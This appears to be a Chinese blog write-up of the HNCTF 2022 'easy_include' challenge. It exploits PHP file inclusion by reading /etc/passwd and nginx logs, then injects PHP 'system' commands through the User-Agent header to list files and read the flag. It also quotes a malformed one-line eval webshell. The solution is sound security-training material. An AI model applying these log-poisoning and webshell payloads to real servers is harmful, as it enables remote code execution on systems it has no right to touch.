首页 > 其他分享 >[HNCTF 2022 WEEK2]easy_include

[HNCTF 2022 WEEK2]easy_include

时间:2024-09-07 10:51:39浏览次数:14  
标签:file WEEK2 log Agent nginx User easy var include

开启NSSCTF靶场,打开链接:

可以看到过滤了很多常见的利用协议,GET传参是file


先随便读取点正常的文件吧,构造payload:

/?file=/etc/passwd

可以看到是nginx服务器还有日志文件信息

apache服务器日志存放文件位置:/var/log/apache/access.log

nginx服务器日志存放位置:/var/log/nginx/access.log和/var/log/nginx/error.log


直接构造payload:

/?file=/var/log/nginx/access.log

显示的内容是浏览器和部分系统的信息,这些都是User-Agent头的内容,猜测可以修改User-Agent头的内容来执行命令


用burp抓包,修改User-Agent头的内容为:

<?php system('ls /');?>

显示出一堆文件,其中ffflllaaaggg是我们需要的


还是修改User-Agent头的内容为:

<?php system('cat /ffflllaaaggg');?>或<?php system('cat /f*');?>

得到flag:

NSSCTF{964e6b5b-3652-441a-ad3a-142a851a7804}


看到有文章说上传一句话木马也可以,就试了试:

<?php @eval($_POST['pass'];?)>

但是用中国蚁剑连接却显示返回数据为空?

标签:file,WEEK2,log,Agent,nginx,User,easy,var,include
From: https://blog.csdn.net/weixin_73049307/article/details/141992555

相关文章

  • 探索EasyCVR与AI技术深度融合:视频汇聚平台的新增长点
    随着5G、AI、边缘计算、物联网(IoT)、云计算等技术的快速发展,万物互联已经从概念逐渐转变为现实,AIoT(物联网人工智能)的新时代正在加速到来。在这一背景下,视频技术作为信息传输和交互的重要手段,其重要性日益凸显。旭帆科技EasyCVR视频汇聚平台,作为一款基于云-边-端一体化架构的视频融......
  • 防患于未然,智能监控新视角:EasyCVR视频平台在高校安全防控中的关键角色
    有网民发视频称,某大学食堂内发生争执打斗事件。一男一女两名学生疑似因座位问题发生争执,女子被打倒在地。此事引发网友关注。高校食堂作为师生日常用餐的聚集地,人员密集且流动性大,极易因排队、价格、口味等问题引发争执,甚至升级为打斗事件。这些事件不仅破坏了校园和谐氛围,还可能......
  • easyUI定区关联快递员js代码
    easyUI定区关联快递员js代码:<scripttype="text/javascript">$.fn.serializeJson=function(){varserializeObj={};vararray=this.serializeArray();varstr=this.serialize();......
  • Easy树
    Easy树题意给出一棵树,要求你为树上的结点标上权值,权值可以是任意的正整数唯一的限制条件是相临的两个结点不能标上相同的权值,要求一种方案,使得整棵树的总价值最小。思路有一个错误的贪心思路,即把树染色,较多的填\(1\),较少的填\(2\)。这种思路可以被两个中心连在一起的菊花......
  • C++(#include <algorithm>)
    目录1.std::sort2.std::reverse3.std::find4.std::copy5.std::equal6.std::for_each7.std::unique8.std::transform总结#include<algorithm>是C++标准库中的一个头文件,包含了许多常用的算法函数,提供了操作容器、范围和数据的功能。这个库中的算法大多数是通用的,可......
  • sql注入(极客大挑战2019EasySQL1)
    题目链接我们输入http://643dcead-c254-412c-a4fe-5787862bbf9e.node5.buuoj.cn:81/check.php?username=admin'andpassword=13123响应为如下,提示我们输入password,看似url中查询了password,但是因为这是一个字符型注入,后台url转为SELECT*FROMusersWHEREusername='admi......
  • 浅述GIS技术与EasyCVR的深度融合:构建视频监控的地理空间信息化综管平台
    随着科技的飞速发展,视频监控与地理信息系统(GIS)技术的融合在各行各业中展现出强大的应用潜力和价值。旭帆科技EasyCVR视频平台,作为一款高性能的视频汇聚管理平台,凭借其强大的视频处理、汇聚与融合能力,结合GIS技术,为智慧安防、应急救援等领域提供了更为全面、高效的解决方案。GIS技......
  • 视频监控系统布局策略:EasyCVR视频汇聚平台构建高效、全面的安全防线
    随着科技的飞速发展,视频监控系统已成为现代社会安全防范的重要组成部分,广泛应用于公共场所、企业园区、住宅小区等各个领域。一个科学合理的视频监控系统布局与选型策略,不仅能够显著提升安全监控的效率和效果,还能在关键时刻提供关键证据,保障人员与财产的安全。一、需求分析:明确监......
  • 超强台风“摩羯”来临:EasyCVR平台如何汇聚城市视频资源,构建应急监测网
    一、背景概述2024年第11号台风“摩羯”自生成以来,迅速加强为超强台风级别,预计将在海南琼海到广东电白一带沿海登陆,带来16-17级的强风和巨浪。中央气象台和各地气象部门纷纷发布预警,各级政府和相关部门紧急启动应急响应机制,全力做好防台抗灾工作。我国作为自然灾害多发的国家,每年......
  • 【工具使用】【EasyExcel 】EasyExcel 实现 Excel 作者信息、版本信息等的写入和读取
    1 前言导入的功能,想必大家都做过,大家肯定也都遇到过比如我的模板变化了(比如新增一列、删除一列等),客户在使用的时候可能还是用的老模板进行导入,那么我们在写代码的时候,应该怎么快速识别到呢?比如可以比较客户导入的Excel一列一列的去比较或者列的个数等是可以的。我想的一个......